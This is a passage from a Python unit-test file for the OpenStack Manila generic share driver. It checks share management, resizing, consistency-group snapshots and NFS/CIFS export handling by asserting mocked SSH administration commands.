share['export_locations'][0]['path']) self._driver._get_mounted_share_size.assert_called_once_with( fake_path, server_details) self.assertFalse(self._driver._get_volume.called) def test_manage_share_attached_to_cinder_volume_not_found(self): share = get_fake_manage_share() server_details = {} driver_options = {'volume_id': 'fake'} self._setup_manage_mocks(server_details=server_details) self.mock_object( self._driver.volume_api, 'get', mock.Mock(side_effect=exception.VolumeNotFound(volume_id="fake")) ) self.assertRaises(exception.ManageInvalidShare, self._driver.manage_existing, share, driver_options) self._driver.volume_api.get.assert_called_once_with( mock.ANY, driver_options['volume_id']) def test_manage_share_attached_to_cinder_volume_not_mounted_to_srv(self): share = get_fake_manage_share() server_details = {'instance_id': 'fake'} driver_options = {'volume_id': 'fake'} volume = {'id': 'fake'} self._setup_manage_mocks(server_details=server_details) self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=volume)) self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[])) self.assertRaises(exception.ManageInvalidShare, self._driver.manage_existing, share, driver_options) self._driver.volume_api.get.assert_called_once_with( mock.ANY, driver_options['volume_id']) self._driver.compute_api.instance_volumes_list.assert_called_once_with( mock.ANY, server_details['instance_id']) def test_manage_share_attached_to_cinder_volume(self): share = get_fake_manage_share() fake_size = 'foobar' fake_exports = ['foo', 'bar'] server_details = {'instance_id': 'fake'} driver_options = {'volume_id': 'fake'} volume = {'id': 'fake', 'name': 'fake_volume_1', 'size': fake_size} 
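        # Managing a share already backed by an attached Cinder volume: the
        # driver should take the share size from the volume, rename the
        # volume to the template-based name and record the volume id in
        # private storage.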
self._setup_manage_mocks(server_details=server_details) self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=volume)) self._driver.volume_api.update = mock.Mock() fake_volume = mock.Mock() fake_volume.id = 'fake' self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[fake_volume])) self.mock_object( self._driver._helpers[share['share_proto']], 'get_exports_for_share', mock.Mock(return_value=fake_exports)) result = self._driver.manage_existing(share, driver_options) self.assertEqual( {'size': fake_size, 'export_locations': fake_exports}, result) self._driver._helpers[share['share_proto']].get_exports_for_share.\ assert_called_once_with( server_details, share['export_locations'][0]['path']) expected_volume_update = { 'name': self._driver._get_volume_name(share['id']) } self._driver.volume_api.update.assert_called_once_with( mock.ANY, volume['id'], expected_volume_update) self.fake_private_storage.update.assert_called_once_with( share['id'], {'volume_id': volume['id']} ) def test_get_mounted_share_size(self): output = ("Filesystem blocks Used Available Capacity Mounted on\n" "/dev/fake 1G 1G 1G 4% /shares/share-fake") self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(output, ''))) actual_result = self._driver._get_mounted_share_size('/fake/path', {}) self.assertEqual(1, actual_result) @ddt.data("fake\nfake\n", "fake", "fake\n") def test_get_mounted_share_size_invalid_output(self, output): self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(output, ''))) self.assertRaises(exception.ManageInvalidShare, self._driver._get_mounted_share_size, '/fake/path', {}) def test_get_consumed_space(self): mount_path = "fake_path" server_details = {} index = 2 valid_result = 1 self.mock_object(self._driver, '_get_mount_stats_by_index', mock.Mock(return_value=valid_result * 1024)) actual_result = self._driver._get_consumed_space( mount_path, server_details) self.assertEqual(valid_result, actual_result) self._driver._get_mount_stats_by_index.assert_called_once_with( mount_path, server_details, index, block_size='M' ) def test_get_consumed_space_invalid(self): self.mock_object( self._driver, '_get_mount_stats_by_index', mock.Mock(side_effect=exception.ManilaException("fake")) ) self.assertRaises( exception.InvalidShare, self._driver._get_consumed_space, "fake", "fake" ) def test_extend_share(self): fake_volume = "fake" fake_share = { 'id': 'fake', 'share_proto': 'NFS', 'name': 'test_share', } new_size = 123 srv_details = self.server['backend_details'] self.mock_object( self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=self.server) ) self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_extend_volume') self.mock_object(self._driver, '_attach_volume') self.mock_object(self._driver, '_mount_device') self.mock_object(self._driver, '_resize_filesystem') self.mock_object( self._driver, '_get_volume', mock.Mock(return_value=fake_volume) ) CONF.set_default('driver_handles_share_servers', False) self._driver.extend_share(fake_share, new_size) self.assertTrue( self._driver.service_instance_manager.get_common_server.called) self._driver._unmount_device.assert_called_once_with( fake_share, srv_details) self._driver._detach_volume.assert_called_once_with( mock.ANY, fake_share, srv_details) self._driver._get_volume.assert_called_once_with( mock.ANY, fake_share['id']) self._driver._extend_volume.assert_called_once_with( mock.ANY, 
fake_volume, new_size) self._driver._attach_volume.assert_called_once_with( mock.ANY, fake_share, srv_details['instance_id'], mock.ANY) self._helper_nfs.disable_access_for_maintenance.\ assert_called_once_with(srv_details, 'test_share') self._helper_nfs.restore_access_after_maintenance.\ assert_called_once_with(srv_details, 'test_share') self.assertTrue(self._driver._resize_filesystem.called) def test_extend_volume(self): fake_volume = {'id': 'fake'} new_size = 123 self.mock_object(self._driver.volume_api, 'extend') self.mock_object(self._driver, '_wait_for_available_volume') self._driver._extend_volume(self._context, fake_volume, new_size) self._driver.volume_api.extend.assert_called_once_with( self._context, fake_volume['id'], new_size ) self._driver._wait_for_available_volume.assert_called_once_with( fake_volume, mock.ANY, msg_timeout=mock.ANY, msg_error=mock.ANY, expected_size=new_size ) def test_resize_filesystem(self): fake_server_details = {'fake': 'fake'} fake_volume = {'mountpoint': '/dev/fake'} self.mock_object(self._driver, '_ssh_exec') self._driver._resize_filesystem( fake_server_details, fake_volume, new_size=123) self._driver._ssh_exec.assert_any_call( fake_server_details, ['sudo', 'fsck', '-pf', '/dev/fake']) self._driver._ssh_exec.assert_any_call( fake_server_details, ['sudo', 'resize2fs', '/dev/fake', "%sG" % 123] ) self.assertEqual(2, self._driver._ssh_exec.call_count) @ddt.data( { 'source': processutils.ProcessExecutionError( stderr="resize2fs: New size smaller than minimum (123456)"), 'target': exception.Invalid }, { 'source': processutils.ProcessExecutionError(stderr="fake_error"), 'target': exception.ManilaException } ) @ddt.unpack def test_resize_filesystem_invalid_new_size(self, source, target): fake_server_details = {'fake': 'fake'} fake_volume = {'mountpoint': '/dev/fake'} ssh_mock = mock.Mock(side_effect=["fake", source]) self.mock_object(self._driver, '_ssh_exec', ssh_mock) self.assertRaises( target, self._driver._resize_filesystem, fake_server_details, fake_volume, new_size=123 ) def test_shrink_share_invalid_size(self): fake_share = {'id': 'fake', 'export_locations': [{'path': 'test'}]} new_size = 123 self.mock_object( self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=self.server) ) self.mock_object(self._driver, '_get_helper') self.mock_object(self._driver, '_get_consumed_space', mock.Mock(return_value=200)) CONF.set_default('driver_handles_share_servers', False) self.assertRaises( exception.ShareShrinkingPossibleDataLoss, self._driver.shrink_share, fake_share, new_size ) self._driver._get_helper.assert_called_once_with(fake_share) self._driver._get_consumed_space.assert_called_once_with( mock.ANY, self.server['backend_details']) def _setup_shrink_mocks(self): share = {'id': 'fake', 'export_locations': [{'path': 'test'}], 'name': 'fake'} volume = {'id': 'fake'} new_size = 123 server_details = self.server['backend_details'] self.mock_object( self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=self.server) ) helper = mock.Mock() self.mock_object(self._driver, '_get_helper', mock.Mock(return_value=helper)) self.mock_object(self._driver, '_get_consumed_space', mock.Mock(return_value=100)) self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=volume)) self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_mount_device') CONF.set_default('driver_handles_share_servers', False) return share, volume, new_size, server_details, helper @ddt.data({'source': 
exception.Invalid("fake"), 'target': exception.ShareShrinkingPossibleDataLoss}, {'source': exception.ManilaException("fake"), 'target': exception.Invalid}) @ddt.unpack def test_shrink_share_error_on_resize_fs(self, source, target): share, vol, size, server_details, _ = self._setup_shrink_mocks() resize_mock = mock.Mock(side_effect=source) self.mock_object(self._driver, '_resize_filesystem', resize_mock) self.assertRaises(target, self._driver.shrink_share, share, size) resize_mock.assert_called_once_with(server_details, vol, new_size=size) def test_shrink_share(self): share, vol, size, server_details, helper = self._setup_shrink_mocks() self.mock_object(self._driver, '_resize_filesystem') self._driver.shrink_share(share, size) self._driver._get_helper.assert_called_once_with(share) self._driver._get_consumed_space.assert_called_once_with( mock.ANY, server_details) self._driver._get_volume.assert_called_once_with(mock.ANY, share['id']) self._driver._unmount_device.assert_called_once_with(share, server_details) self._driver._resize_filesystem( server_details, vol, new_size=size) self._driver._mount_device(share, server_details, vol) self.assertTrue(helper.disable_access_for_maintenance.called) self.assertTrue(helper.restore_access_after_maintenance.called) @ddt.data({'share_servers': [], 'result': None}, {'share_servers': None, 'result': None}, {'share_servers': ['fake'], 'result': 'fake'}, {'share_servers': ['fake', 'test'], 'result': 'fake'}) @ddt.unpack def tests_choose_share_server_compatible_with_share(self, share_servers, result): fake_share = "fake" actual_result = self._driver.choose_share_server_compatible_with_share( self._context, share_servers, fake_share ) self.assertEqual(result, actual_result) @ddt.data({'consistency_group': {'share_server_id': 'fake'}, 'result': {'id': 'fake'}}, {'consistency_group': None, 'result': {'id': 'fake'}}, {'consistency_group': {'share_server_id': 'test'}, 'result': {'id': 'test'}}) @ddt.unpack def tests_choose_share_server_compatible_with_share_and_cg( self, consistency_group, result): share_servers = [{'id': 'fake'}, {'id': 'test'}] fake_share = "fake" actual_result = self._driver.choose_share_server_compatible_with_share( self._context, share_servers, fake_share, consistency_group=consistency_group ) self.assertEqual(result, actual_result) def test_create_consistency_group(self): FAKE_SNAP_DICT = get_fake_snap_dict() result = self._driver.create_consistency_group( self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(1, self.mock_debug_log.call_count) self.assertEqual(1, self.mock_warning_log.call_count) self.assertIsNone(result) def test_delete_consistency_group(self): FAKE_SNAP_DICT = get_fake_snap_dict() result = self._driver.delete_consistency_group( self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(1, self.mock_debug_log.call_count) self.assertIsNone(result) def test_create_cgsnapshot_no_cg_members(self): FAKE_SNAP_DICT = dict(get_fake_snap_dict(), cgsnapshot_members=[]) mock_snapshot_creation = self.mock_object(generic.GenericShareDriver, 'create_snapshot') result = self._driver.create_cgsnapshot( self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(1, self.mock_debug_log.call_count) self.assertEqual(2, self.mock_warning_log.call_count) self.assertFalse(mock_snapshot_creation.called) self.assertEqual((None, None), result) @ddt.data( { 'delete_snap_side_effect': None, 'expected_error_log_call_count': 0, }, { 'delete_snap_side_effect': exception.ManilaException, 
'expected_error_log_call_count': 1, } ) @ddt.unpack def test_create_cgsnapshot_manila_exception_on_create_and_delete( self, delete_snap_side_effect, expected_error_log_call_count): FAKE_SNAP_DICT = get_fake_snap_dict() # Append another fake share FAKE_SHARE = dict(FAKE_SNAP_DICT['cgsnapshot_members'][0]) FAKE_SNAP_DICT['cgsnapshot_members'].append(FAKE_SHARE) self.mock_object(generic.GenericShareDriver, 'create_snapshot', mock.Mock(side_effect=[ None, exception.ManilaException, ])) self.mock_object(generic.GenericShareDriver, 'delete_snapshot', mock.Mock(side_effect=delete_snap_side_effect)) self.assertRaises(exception.ManilaException, self._driver.create_cgsnapshot, self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(2, self.mock_debug_log.call_count) self.assertEqual(1, self.mock_warning_log.call_count) self.assertEqual(1, self.mock_exception_log.call_count) self.assertEqual(expected_error_log_call_count, self.mock_error_log.call_count) def test_create_cgsnapshot(self): FAKE_SNAP_DICT = get_fake_snap_dict() FAKE_SHARE_SNAPSHOT = { 'share_id': 'e14b5174-e534-4f35-bc4f-fe81c1575d6f', 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', } mock_snapshot_creation = self.mock_object(generic.GenericShareDriver, 'create_snapshot') result = self._driver.create_cgsnapshot( self._context, FAKE_SNAP_DICT, share_server=self.server) mock_snapshot_creation.assert_called_once_with(self._context, FAKE_SHARE_SNAPSHOT, self.server) self.assertEqual(2, self.mock_debug_log.call_count) self.assertEqual(1, self.mock_warning_log.call_count) self.assertFalse(self.mock_error_log.called) self.assertEqual((None, None), result) def test_delete_cgsnapshot_manila_exception(self): FAKE_SNAP_DICT = get_fake_snap_dict() self.mock_object(generic.GenericShareDriver, 'delete_snapshot', mock.Mock(side_effect=exception.ManilaException)) self.assertRaises(exception.ManilaException, self._driver.delete_cgsnapshot, self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(1, self.mock_error_log.call_count) def test_delete_cgsnapshot(self): FAKE_SNAP_DICT = get_fake_snap_dict() FAKE_SHARE_SNAPSHOT = { 'share_id': 'e14b5174-e534-4f35-bc4f-fe81c1575d6f', 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', } mock_snapshot_creation = self.mock_object(generic.GenericShareDriver, 'delete_snapshot') result = self._driver.delete_cgsnapshot( self._context, FAKE_SNAP_DICT, share_server=self.server) mock_snapshot_creation.assert_called_once_with(self._context, FAKE_SHARE_SNAPSHOT, self.server) self.assertEqual(2, self.mock_debug_log.call_count) self.assertEqual((None, None), result) def test_create_consistency_group_from_cgsnapshot_no_members(self): FAKE_CG_DICT = get_fake_cg_dict() FAKE_CGSNAP_DICT = dict(get_fake_snap_dict(), cgsnapshot_members=[]) mock_share_creation = self.mock_object(generic.GenericShareDriver, 'create_share_from_snapshot') result = self._driver.create_consistency_group_from_cgsnapshot( self._context, FAKE_CG_DICT, FAKE_CGSNAP_DICT, share_server=self.server) self.assertFalse(self.mock_debug_log.called) self.assertFalse(mock_share_creation.called) self.assertEqual((None, None), result) def test_create_consistency_group_from_cgsnapshot(self): FAKE_CG_DICT = get_fake_cg_dict() FAKE_CGSNAP_DICT = get_fake_snap_dict() FAKE_COLLATED_INFO = get_fake_collated_cg_snap_info() FAKE_SHARE_UPDATE_LIST = [ { 'id': '02a32f06e-14f2-45a5-9631-7483f1937bd8', 'export_locations': 'xyzzy', } ] self.mock_object(generic.GenericShareDriver, '_collate_cg_snapshot_info', mock.Mock(return_value=FAKE_COLLATED_INFO)) 
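        # Creating a CG from a cgsnapshot reduces to one
        # create_share_from_snapshot call per collated (share, snapshot)
        # pair; the mocked return value below ends up as the new share's
        # export_locations in the reported update list.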
mock_share_creation = self.mock_object(generic.GenericShareDriver, 'create_share_from_snapshot', mock.Mock(return_value='xyzzy')) result = self._driver.create_consistency_group_from_cgsnapshot( self._context, FAKE_CG_DICT, FAKE_CGSNAP_DICT, share_server=self.server) self.assertEqual((None, FAKE_SHARE_UPDATE_LIST), result) self.assertEqual(1, self.mock_debug_log.call_count) mock_share_creation.assert_called_once_with( self._context, FAKE_COLLATED_INFO[0]['share'], FAKE_COLLATED_INFO[0]['snapshot'], share_server=self.server ) def test_collate_cg_snapshot_info_invalid_cg(self): FAKE_CG_DICT = get_fake_cg_dict() FAKE_CGSNAP_DICT = dict(get_fake_snap_dict(), cgsnapshot_members=[]) self.assertRaises(exception.InvalidConsistencyGroup, self._driver._collate_cg_snapshot_info, FAKE_CG_DICT, FAKE_CGSNAP_DICT) def test_collate_cg_snapshot(self): FAKE_CG_DICT = get_fake_cg_dict() FAKE_CGSNAP_DICT = get_fake_snap_dict() FAKE_COLLATED_INFO = get_fake_collated_cg_snap_info() result = self._driver._collate_cg_snapshot_info( FAKE_CG_DICT, FAKE_CGSNAP_DICT) self.assertEqual(FAKE_COLLATED_INFO, result) @generic.ensure_server def fake(driver_instance, context, share_server=None): return share_server @ddt.ddt class GenericDriverEnsureServerTestCase(test.TestCase): def setUp(self): super(GenericDriverEnsureServerTestCase, self).setUp() self._context = context.get_admin_context() self.server = {'id': 'fake_id', 'backend_details': {'foo': 'bar'}} self.dhss_false = type( 'Fake', (object,), {'driver_handles_share_servers': False}) self.dhss_true = type( 'Fake', (object,), {'driver_handles_share_servers': True}) def test_share_servers_are_not_handled_server_not_provided(self): self.dhss_false.service_instance_manager = mock.Mock() self.dhss_false.service_instance_manager.get_common_server = ( mock.Mock(return_value=self.server)) self.dhss_false.service_instance_manager.ensure_service_instance = ( mock.Mock(return_value=True)) actual = fake(self.dhss_false, self._context) self.assertEqual(self.server, actual) self.dhss_false.service_instance_manager.\ get_common_server.assert_called_once_with() self.dhss_false.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) @ddt.data({'id': 'without_details'}, {'id': 'with_details', 'backend_details': {'foo': 'bar'}}) def test_share_servers_are_not_handled_server_provided(self, server): self.assertRaises( exception.ManilaException, fake, self.dhss_false, self._context, share_server=server) def test_share_servers_are_handled_server_provided(self): self.dhss_true.service_instance_manager = mock.Mock() self.dhss_true.service_instance_manager.ensure_service_instance = ( mock.Mock(return_value=True)) actual = fake(self.dhss_true, self._context, share_server=self.server) self.assertEqual(self.server, actual) self.dhss_true.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) def test_share_servers_are_handled_invalid_server_provided(self): server = {'id': 'without_details'} self.assertRaises( exception.ManilaException, fake, self.dhss_true, self._context, share_server=server) def test_share_servers_are_handled_server_not_provided(self): self.assertRaises( exception.ManilaException, fake, self.dhss_true, self._context) @ddt.ddt class NFSHelperTestCase(test.TestCase): """Test case for NFS helper of generic driver.""" def setUp(self): super(NFSHelperTestCase, self).setUp() fake_utils.stub_out_utils_execute(self) self.fake_conf = 
manila.share.configuration.Configuration(None) self._ssh_exec = mock.Mock(return_value=('', '')) self._execute = mock.Mock(return_value=('', '')) self._helper = generic.NFSHelper(self._execute, self._ssh_exec, self.fake_conf) ip = '10.254.0.3' self.server = fake_compute.FakeServer( ip=ip, public_address=ip, instance_id='fake_instance_id') self.share_name = 'fake_share_name' def test_create_export(self): ret = self._helper.create_export(self.server, self.share_name) expected_location = ':'.join([self.server['public_address'], os.path.join(CONF.share_mount_path, self.share_name)]) self.assertEqual(ret, expected_location) @ddt.data(const.ACCESS_LEVEL_RW, const.ACCESS_LEVEL_RO) def test_allow_access(self, data): self.mock_object(self._helper, '_sync_nfs_temp_and_perm_files') self._helper.allow_access( self.server, self.share_name, 'ip', data, '10.0.0.2') local_path = os.path.join(CONF.share_mount_path, self.share_name) self._ssh_exec.assert_has_calls([ mock.call(self.server, ['sudo', 'exportfs']), mock.call(self.server, ['sudo', 'exportfs', '-o', '%s,no_subtree_check' % data, ':'.join(['10.0.0.2', local_path])]) ]) self._helper._sync_nfs_temp_and_perm_files.assert_called_once_with( self.server) def test_allow_access_no_ip(self): self.assertRaises( exception.InvalidShareAccess, self._helper.allow_access, self.server, self.share_name, 'fake_type', 'fake_level', 'fake_rule') @ddt.data(const.ACCESS_LEVEL_RW, const.ACCESS_LEVEL_RO) def test_deny_access(self, data): self.mock_object(self._helper, '_sync_nfs_temp_and_perm_files') local_path = os.path.join(CONF.share_mount_path, self.share_name) access = dict( access_to='10.0.0.2', access_type='ip', access_level=data) self._helper.deny_access(self.server, self.share_name, access) export_string = ':'.join(['10.0.0.2', local_path]) expected_exec = ['sudo', 'exportfs', '-u', export_string] self._ssh_exec.assert_called_once_with(self.server, expected_exec) self._helper._sync_nfs_temp_and_perm_files.assert_called_once_with( self.server) def test_sync_nfs_temp_and_perm_files(self): self._helper._sync_nfs_temp_and_perm_files(self.server) self._helper._ssh_exec.assert_called_once_with(self.server, mock.ANY) @ddt.data('/foo/bar', '5.6.7.8:/bar/quuz', '5.6.7.88:/foo/quuz') def test_get_exports_for_share(self, export_location): server = dict(public_address='1.2.3.4') result = self._helper.get_exports_for_share(server, export_location) path = export_location.split(':')[-1] self.assertEqual([':'.join([server['public_address'], path])], result) @ddt.data( {'public_address_with_suffix': 'foo'}, {'with_prefix_public_address': 'bar'}, {'with_prefix_public_address_and_with_suffix': 'quuz'}, {}) def test_get_exports_for_share_with_error(self, server): export_location = '1.2.3.4:/foo/bar' self.assertRaises( exception.ManilaException, self._helper.get_exports_for_share, server, export_location) @ddt.data('/foo/bar', '5.6.7.8:/foo/bar', '5.6.7.88:fake:/foo/bar') def test_get_share_path_by_export_location(self, export_location): result = self._helper.get_share_path_by_export_location( dict(), export_location) self.assertEqual('/foo/bar', result) def test_disable_access_for_maintenance(self): fake_maintenance_path = "fake.path" share_mount_path = os.path.join( self._helper.configuration.share_mount_path, self.share_name) self.mock_object(self._helper, '_ssh_exec') self.mock_object(self._helper, '_sync_nfs_temp_and_perm_files') self.mock_object(self._helper, '_get_maintenance_file_path', mock.Mock(return_value=fake_maintenance_path)) 
self._helper.disable_access_for_maintenance( self.server, self.share_name) self._helper._ssh_exec.assert_any_call( self.server, ['cat', const.NFS_EXPORTS_FILE, '| grep', self.share_name, '| sudo tee', fake_maintenance_path] ) self._helper._ssh_exec.assert_any_call( self.server, ['sudo', 'exportfs', '-u', share_mount_path] ) self._helper._sync_nfs_temp_and_perm_files.assert_called_once_with( self.server ) def test_restore_access_after_maintenance(self): fake_maintenance_path = "fake.path" self.mock_object(self._helper, '_get_maintenance_file_path', mock.Mock(return_value=fake_maintenance_path)) self.mock_object(self._helper, '_ssh_exec') self._helper.restore_access_after_maintenance( self.server, self.share_name) self._helper._ssh_exec.assert_called_once_with( self.server, ['cat', fake_maintenance_path, '| sudo tee -a', const.NFS_EXPORTS_FILE, '&& sudo exportfs -r', '&& sudo rm -f', fake_maintenance_path] ) @ddt.ddt class CIFSHelperTestCase(test.TestCase): """Test case for CIFS helper of generic driver.""" def setUp(self): super(CIFSHelperTestCase, self).setUp() self.server_details = {'instance_id': 'fake', 'public_address': '1.2.3.4', } self.share_name = 'fake_share_name' self.fake_conf = manila.share.configuration.Configuration(None) self._ssh_exec = mock.Mock(return_value=('', '')) self._execute = mock.Mock(return_value=('', '')) self._helper = generic.CIFSHelper(self._execute, self._ssh_exec, self.fake_conf) self.access = dict( access_level=const.ACCESS_LEVEL_RW, access_type='ip', access_to='1.1.1.1') def test_init_helper(self): self._helper.init_helper(self.server_details) self._helper._ssh_exec.assert_called_once_with( self.server_details, ['sudo', 'net', 'conf', 'list'], ) def test_create_export_share_does_not_exist(self): def fake_ssh_exec(*args, **kwargs): if 'showshare' in args[1]: raise exception.ProcessExecutionError() else: return ('', '') self.mock_object(self._helper, '_ssh_exec', mock.Mock(side_effect=fake_ssh_exec)) ret = self._helper.create_export(self.server_details, self.share_name) expected_location = '\\\\%s\\%s' % ( self.server_details['public_address'], self.share_name) self.assertEqual(ret, expected_location) share_path = os.path.join( self._helper.configuration.share_mount_path, self.share_name) self._helper._ssh_exec.assert_has_calls([ mock.call( self.server_details, ['sudo', 'net', 'conf', 'showshare', self.share_name, ] ), mock.call( self.server_details, [ 'sudo', 'net', 'conf', 'addshare', self.share_name, share_path, 'writeable=y', 'guest_ok=y', ] ), mock.call(self.server_details, mock.ANY), ]) def test_create_export_share_exist_recreate_true(self): ret = self._helper.create_export(self.server_details, self.share_name, recreate=True) expected_location = '\\\\%s\\%s' % ( self.server_details['public_address'], self.share_name) self.assertEqual(ret, expected_location) share_path = os.path.join( self._helper.configuration.share_mount_path, self.share_name) self._helper._ssh_exec.assert_has_calls([ mock.call( self.server_details, ['sudo', 'net', 'conf', 'showshare', self.share_name, ] ), mock.call( self.server_details, ['sudo', 'net', 'conf', 'delshare', self.share_name, ] ), mock.call( self.server_details, [ 'sudo', 'net', 'conf', 'addshare', self.share_name, share_path, 'writeable=y', 'guest_ok=y', ] ), mock.call(self.server_details, mock.ANY), ]) def test_create_export_share_exist_recreate_false(self): self.assertRaises( exception.ShareBackendException, self._helper.create_export, self.server_details, self.share_name, recreate=False, ) 
self._helper._ssh_exec.assert_has_calls([ mock.call( self.server_details, ['sudo', 'net', 'conf', 'showshare', self.share_name, ] ), ]) def test_remove_export(self): self._helper.remove_export(self.server_details, self.share_name) self._helper._ssh_exec.assert_called_once_with( self.server_details, ['sudo', 'net', 'conf', 'delshare', self.share_name], ) def test_remove_export_forcibly(self): delshare_command = ['sudo', 'net', 'conf', 'delshare', self.share_name] def fake_ssh_exec(*args, **kwargs): if delshare_command == args[1]: raise exception.ProcessExecutionError() else: return ('', '') self.mock_object(self._helper, '_ssh_exec', mock.Mock(side_effect=fake_ssh_exec)) self._helper.remove_export(self.server_details, self.share_name) self._helper._ssh_exec.assert_has_calls([ mock.call( self.server_details, ['sudo', 'net', 'conf', 'delshare', self.share_name], ), mock.call( self.server_details, ['sudo', 'smbcontrol', 'all', 'close-share', self.share_name], ), ]) def test_allow_access_ip_exist(self): hosts = [self.access['access_to'], ] self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=hosts)) self.mock_object(self._helper, '_set_allow_hosts') self.assertRaises( exception.ShareAccessExists, self._helper.allow_access, self.server_details, self.share_name, self.access['access_type'], self.access['access_level'], self.access['access_to']) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_has_calls([]) def test_allow_access_ip_does_not_exist(self): hosts = [] self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=hosts)) self.mock_object(self._helper, '_set_allow_hosts') self._helper.allow_access( self.server_details, self.share_name, self.access['access_type'], self.access['access_level'], self.access['access_to']) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_called_once_with( self.server_details, hosts, self.share_name) def test_allow_access_wrong_type(self): self.assertRaises( exception.InvalidShareAccess, self._helper.allow_access, self.server_details, self.share_name, 'fake', const.ACCESS_LEVEL_RW, '1.1.1.1') @ddt.data(const.ACCESS_LEVEL_RO, 'fake') def test_allow_access_wrong_access_level(self, data): self.assertRaises( exception.InvalidShareAccessLevel, self._helper.allow_access, self.server_details, self.share_name, 'ip', data, '1.1.1.1') @ddt.data(const.ACCESS_LEVEL_RO, 'fake') def test_deny_access_unsupported_access_level(self, data): access = dict(access_to='1.1.1.1', access_level=data) self.mock_object(self._helper, '_get_allow_hosts') self.mock_object(self._helper, '_set_allow_hosts') self._helper.deny_access(self.server_details, self.share_name, access) self.assertFalse(self._helper._get_allow_hosts.called) self.assertFalse(self._helper._set_allow_hosts.called) def test_deny_access_list_has_value(self): hosts = [self.access['access_to'], ] self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=hosts)) self.mock_object(self._helper, '_set_allow_hosts') self._helper.deny_access( self.server_details, self.share_name, self.access) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_called_once_with( self.server_details, [], self.share_name) def test_deny_access_list_does_not_have_value(self): hosts = [] self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(return_value=hosts)) 
self.mock_object(self._helper, '_set_allow_hosts') self._helper.deny_access( self.server_details, self.share_name, self.access) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_has_calls([]) def test_deny_access_force(self): self.mock_object( self._helper, '_get_allow_hosts', mock.Mock(side_effect=exception.ProcessExecutionError()), ) self.mock_object(self._helper, '_set_allow_hosts') self._helper.deny_access( self.server_details, self.share_name, self.access, force=True) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_has_calls([]) def test_deny_access_not_force(self): def raise_process_execution_error(*args, **kwargs): raise exception.ProcessExecutionError() self.mock_object(self._helper, '_get_allow_hosts', mock.Mock(side_effect=raise_process_execution_error)) self.mock_object(self._helper, '_set_allow_hosts') self.assertRaises( exception.ProcessExecutionError, self._helper.deny_access, self.server_details, self.share_name, self.access) self._helper._get_allow_hosts.assert_called_once_with( self.server_details, self.share_name) self._helper._set_allow_hosts.assert_has_calls([]) @ddt.data( '', '1.2.3.4:/nfs/like/export', '/1.2.3.4/foo', '\\1.2.3.4\\foo', '//1.2.3.4\\mixed_slashes_and_backslashes_one', '\\\\1.2.3.4/mixed_slashes_and_backslashes_two') def test__get_share_group_name_from_export_location(self, export_location): self.assertRaises( exception.InvalidShare, self._helper._get_share_group_name_from_export_location, export_location) @ddt.data('//5.6.7.8/foo', '\\\\5.6.7.8\\foo') def test_get_exports_for_share(self, export_location): server = dict(public_address='1.2.3.4') self.mock_object( self._helper, '_get_share_group_name_from_export_location', mock.Mock(side_effect=( self._helper._get_share_group_name_from_export_location))) result = self._helper.get_exports_for_share(server, export_location) expected_export_location = ['\\\\%s\\foo' % server['public_address']] self.assertEqual(expected_export_location, result) self._helper._get_share_group_name_from_export_location.\ assert_called_once_with(export_location) @ddt.data( {'public_address_with_suffix': 'foo'}, {'with_prefix_public_address': 'bar'}, {'with_prefix_public_address_and_with_suffix': 'quuz'}, {}) def test_get_exports_for_share_with_exception(self, server): export_location = '1.2.3.4:/foo/bar' self.assertRaises( exception.ManilaException, self._helper.get_exports_for_share, server, export_location) @ddt.data('//5.6.7.8/foo', '\\\\5.6.7.8\\foo') def test_get_share_path_by_export_location(self, export_location): fake_path = ' /bar/quuz\n ' fake_server = dict() self.mock_object( self._helper, '_ssh_exec', mock.Mock(return_value=(fake_path, 'fake'))) self.mock_object( self._helper, '_get_share_group_name_from_export_location', mock.Mock(side_effect=( self._helper._get_share_group_name_from_export_location))) result = self._helper.get_share_path_by_export_location( fake_server, export_location) self.assertEqual('/bar/quuz', result) self._helper._ssh_exec.assert_called_once_with( fake_server, ['sudo', 'net', 'conf', 'getparm', 'foo', 'path']) self._helper._get_share_group_name_from_export_location.\ assert_called_once_with(export_location) def test_disable_access_for_maintenance(self): allowed_hosts = ['test', 'test2'] maintenance_path = os.path.join( self._helper.configuration.share_mount_path, "%s.maintenance" % self.share_name) self.mock_object(self._helper, 
